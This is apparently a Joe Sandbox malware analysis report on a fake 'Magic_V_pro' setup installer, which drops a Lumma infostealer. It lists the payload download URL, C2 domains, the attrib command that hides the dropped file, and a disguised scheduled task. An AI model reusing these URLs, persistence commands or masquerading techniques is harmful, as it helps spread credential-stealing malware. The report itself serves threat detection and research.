              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FB1FCB rdtsc 22_2_03FB1FCB
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 17_2_00444660 LdrInitializeThunk,17_2_00444660
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_01078180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_01078180
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FB2720 mov ebx, dword ptr fs:[00000030h]22_2_03FB2720
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FB2ADA mov edx, dword ptr fs:[00000030h]22_2_03FB2ADA
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FB1227 mov edx, dword ptr fs:[00000030h]22_2_03FB1227
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FB65CC mov edx, dword ptr fs:[00000030h]22_2_03FB65CC
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FB39C3 mov eax, dword ptr fs:[00000030h]22_2_03FB39C3
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FC0D30 mov eax, dword ptr fs:[00000030h]22_2_03FC0D30
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeCode function: 22_2_03FC0D1D mov eax, dword ptr fs:[00000030h]22_2_03FC0D1D
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_010958D0 cpuid 10_2_010958D0
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_00FFAFFD GetSystemTimeAsFileTime,10_2_00FFAFFD
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeCode function: 10_2_0102CFFF GetVersionExW,10_2_0102CFFF
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 17.3.taskshostw.exe.2990000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.taskshostw.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.3.taskshostw.exe.2990000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000003.1470597131.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 17.3.taskshostw.exe.2990000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.taskshostw.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.3.taskshostw.exe.2990000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000003.1470597131.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Spearphishing Link
              11
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              OS Credential Dumping1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              1
              DLL Search Order Hijacking
              1
              DLL Search Order Hijacking
              4
              Obfuscated Files or Information
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol2
              Clipboard Data
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter
              1
              Scheduled Task/Job
              1
              Access Token Manipulation
              2
              Software Packing
              Security Account Manager27
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Scheduled Task/Job
              Login Hook11
              Process Injection
              1
              DLL Side-Loading
              NTDS221
              Security Software Discovery
              Distributed Component Object ModelInput Capture115
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Scheduled Task/Job
              1
              DLL Search Order Hijacking
              LSA Secrets2
              Virtualization/Sandbox Evasion
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading
              Cached Domain Credentials1
              Process Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Virtualization/Sandbox Evasion
              DCSync2
              System Owner/User Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632503 Sample: Magic_V_pro_setup_stable_la... Startdate: 08/03/2025 Architecture: WINDOWS Score: 64 69 willpowerwav.site 2->69 71 tinyurl.com 2->71 73 2 other IPs or domains 2->73 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Antivirus detection for URL or domain 2->87 89 7 other signatures 2->89 11 Magic_V_pro_setup_stable_latest_release_version_9_709.exe 2 2->11         started        14 taskshostw.exe 2->14         started        17 taskshostw.exe 2->17         started        signatures3 process4 dnsIp5 59 Magic_V_pro_setup_...e_version_9_709.tmp, PE32 11->59 dropped 19 Magic_V_pro_setup_stable_latest_release_version_9_709.tmp 3 12 11->19         started        81 willpowerwav.site 172.67.194.165, 443, 49727, 49728 CLOUDFLARENETUS United States 14->81 file6 process7 file8 53 C:\Users\user\AppData\Local\Temp\...\idp.dll, PE32 19->53 dropped 55 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->55 dropped 91 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 19->91 23 Magic_V_pro_setup_stable_latest_release_version_9_709.exe 2 19->23         started        signatures9 process10 file11 57 Magic_V_pro_setup_...e_version_9_709.tmp, PE32 23->57 dropped 26 Magic_V_pro_setup_stable_latest_release_version_9_709.tmp 3 21 23->26         started        process12 dnsIp13 75 rentry.org 164.132.58.105, 443, 49719 OVHFR France 26->75 77 rea.grupolalegion.ec 190.92.154.206, 443, 49721, 49724 DesarrollosDigitalesdePulsarConsultingAR Argentina 26->77 79 tinyurl.com 104.18.111.161, 443, 49717 CLOUDFLARENETUS United States 26->79 61 C:\Users\user\AppData\Local\Temp\...\idp.exe, PE32 26->61 dropped 63 C:\Users\user\AppData\Local\Temp\...\idp.dll, PE32 26->63 dropped 65 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 26->65 dropped 67 C:\Users\user\AppData\Local\Temp\...\lang, XML 26->67 dropped 93 Uses schtasks.exe or at.exe to add and modify task schedules 26->93 31 cmd.exe 1 26->31         started        34 idp.exe 2 26->34         started        37 cmd.exe 1 26->37         started        39 schtasks.exe 1 26->39         started        file14 signatures15 process16 file17 95 Uses attrib.exe to hide files 31->95 41 conhost.exe 31->41         started        43 attrib.exe 1 31->43         started        51 C:\Users\user\AppData\...\willrandom.exe, PE32 34->51 dropped 45 conhost.exe 34->45         started        47 conhost.exe 37->47         started        49 conhost.exe 39->49         started        signatures18 process19

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Magic_V_pro_setup_stable_latest_release_version_9_709.exe3%VirustotalBrowse
              Magic_V_pro_setup_stable_latest_release_version_9_709.exe3%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Programs\Common\willrandom.exe100%AviraTR/AVI.Lumma.jtxjg
              C:\Users\user\AppData\Local\Programs\Common\willrandom.exe67%ReversingLabsWin32.Spyware.Lummastealer
              C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-QC304.tmp\idp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://rea.grupolalegion.ec/R100%Avira URL Cloudmalware
              http://jrsoftware.github.io/issrc/ISHelper/isxfunc.xml0%Avira URL Cloudsafe
              https://rea.grupolalegion.ec/willrandom.zipU100%Avira URL Cloudmalware
              http://www.freepdfeditor.net0%Avira URL Cloudsafe
              https://willpowerwav.site/100%Avira URL Cloudmalware
              https://rea.grupolalegion.ec/willrandom.zip100%Avira URL Cloudmalware
              http://www.kymoto.org00%Avira URL Cloudsafe
              https://rea.grupolalegion.ec/willrandom.zipq100%Avira URL Cloudmalware
              http://www.freepdfeditor.netopenU0%Avira URL Cloudsafe
              https://willpowerwav.site/api100%Avira URL Cloudmalware
              https://rea.grupolalegion.ec/willrandom.zipWW100%Avira URL Cloudmalware
              http://www.kymoto.orgq0%Avira URL Cloudsafe
              https://rea.grupolalegion.ec/100%Avira URL Cloudmalware
              https://willpowerwav.site/Y100%Avira URL Cloudmalware
              http://www.microsoft.co(0%Avira URL Cloudsafe
              http://127.0.0.1/innosetup/index.htm0%Avira URL Cloudsafe
              https://willpowerwav.site/apiF100%Avira URL Cloudmalware
              https://willpowerwav.site:443/api100%Avira URL Cloudmalware
              https://willpowerwav.site/apix100%Avira URL Cloudmalware
              https://willpowerwav.site/:100%Avira URL Cloudmalware
              willpowerwav.site100%Avira URL Cloudmalware
              http://www.freepdfeditor.netj0%Avira URL Cloudsafe
              http://schemas.microsoft.coa7H0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              rea.grupolalegion.ec
              190.92.154.206
              truefalse
                high
                tinyurl.com
                104.18.111.161
                truefalse
                  high
                  rentry.org
                  164.132.58.105
                  truefalse
                    high
                    willpowerwav.site
                    172.67.194.165
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      subawhipnator.lifefalse
                        high
                        boltetuurked.digitalfalse
                          high
                          https://rea.grupolalegion.ec/willrandom.zipfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://willpowerwav.site/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          presentymusse.worldfalse
                            high
                            hobbyedsmoker.livefalse
                              high
                              privileggoe.livefalse
                                high
                                https://tinyurl.com/y7yju2tpfalse
                                  high
                                  uncertainyelemz.betfalse
                                    high
                                    deaddereaste.todayfalse
                                      high
                                      https://rentry.org/cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/rawfalse
                                        high
                                        willpowerwav.sitetrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.freepdfeditor.nettaskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.innosetup.com/Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000000.1190034354.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.drfalse
                                          high
                                          https://www.cloudflare.com/learning/access-management/phishing-attack/taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.0000000000784000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000783000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019097864.000000000088E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000852000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.000000000088B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.freepdfeditor.netopenUtaskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://jrsoftware.github.io/issrc/ISHelper/isxfunc.xmlMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240754645.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1237949116.000000007F4C0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1365963683.000000007E170000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1355623818.000000007D840000.00000004.00001000.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://willpowerwav.site/taskshostw.exe, 00000011.00000002.1517647139.000000000070B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1498087630.000000000070A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1498087630.0000000000710000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.000000000070B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.000000000075A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000866000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.kymoto.orgAboutMagic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.00000000022DC000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1187273002.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1192524909.00000000033F0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1250554977.0000000002489000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUMagic_V_pro_setup_stable_latest_release_version_9_709.exefalse
                                                high
                                                https://rea.grupolalegion.ec/RMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.000000000097F000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.000000000097C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://rea.grupolalegion.ec/willrandom.zipqMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://tinyurl.com/1Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.00000000008A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://tinyurl.com/lMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.00000000008A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://rea.grupolalegion.ec/willrandom.zipUMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.kymoto.org0Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.00000000022DC000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1453721155.0000000002241000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kymoto.orgqMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1250554977.000000000246D000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1443446001.000000000240D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://willpowerwav.site/Ytaskshostw.exe, 00000016.00000003.2019868052.0000000000824000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://www.cloudflare.com/5xx-error-landingtaskshostw.exe, 00000011.00000003.1514392072.0000000000702000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497071497.0000000000786000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019868052.000000000081E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019097864.000000000088E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://rea.grupolalegion.ec/willrandom.zipWWMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1417406355.0000000003F35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.microsoft.co(Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://127.0.0.1/innosetup/index.htmMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240754645.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1236181676.000000007F3D0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1365963683.000000007E170000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1355623818.000000007D840000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://willpowerwav.site/apixtaskshostw.exe, 00000011.00000003.1514392072.000000000075E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://rea.grupolalegion.ec/Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.000000000097F000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.000000000097C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://willpowerwav.site/apiFtaskshostw.exe, 00000016.00000002.2039469356.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://willpowerwav.site:443/apitaskshostw.exe, 00000016.00000003.2037241269.000000000083C000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000002.2039954771.0000000000840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://willpowerwav.site/:taskshostw.exe, 00000011.00000003.1514392072.000000000075A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://bitbucket.org/mitrich_k/inno-download-pluginMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1254642443.000000000018F000.00000004.00000010.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.drfalse
                                                        high
                                                        http://schemas.microsoft.coa7HMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1443446001.0000000002482000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.remobjects.com/psMagic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000000.1190034354.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.drfalse
                                                          high
                                                          http://www.freepdfeditor.netjtaskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://tinyurl.com/Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://mitrichsoftware.wordpress.comBMagic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1254642443.000000000018F000.00000004.00000010.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.drfalse
                                                              high
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              164.132.58.105
                                                              rentry.orgFrance
                                                              16276OVHFRfalse
                                                              190.92.154.206
                                                              rea.grupolalegion.ecArgentina
                                                              10986DesarrollosDigitalesdePulsarConsultingARfalse
                                                              104.18.111.161
                                                              tinyurl.comUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              172.67.194.165
                                                              willpowerwav.siteUnited States
                                                              13335CLOUDFLARENETUStrue
                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1632503
                                                              Start date and time:2025-03-08 03:13:19 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 50s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:23
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:Magic_V_pro_setup_stable_latest_release_version_9_709.exe
                                                              Detection:MAL
                                                              Classification:mal64.troj.evad.winEXE@23/12@4/4
                                                              EGA Information:
                                                              • Successful, ratio: 50%
                                                              HCA Information:
                                                              • Successful, ratio: 88%
                                                              • Number of executed functions: 104
                                                              • Number of non-executed functions: 208
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.60.203.209
                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                                              • Execution Graph export aborted for target Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, PID 6800 because there are no executed function
                                                              • Execution Graph export aborted for target taskshostw.exe, PID 8128 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              TimeTypeDescription
                                                              02:14:40Task SchedulerRun new task: WhatsAppSyncTaskMachineCore path: %localappdata%\programs\common\taskshostw.exe
                                                              21:14:29API Interceptor2x Sleep call for process: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp modified
                                                              21:14:49API Interceptor3x Sleep call for process: taskshostw.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              164.132.58.105plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                plugin-newest_release_.exeGet hashmaliciousUnknownBrowse
                                                                  segura.vbsGet hashmaliciousRemcosBrowse
                                                                    asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                      XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                        sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                          RedEngine.exeGet hashmaliciousBabadeda, RedLineBrowse
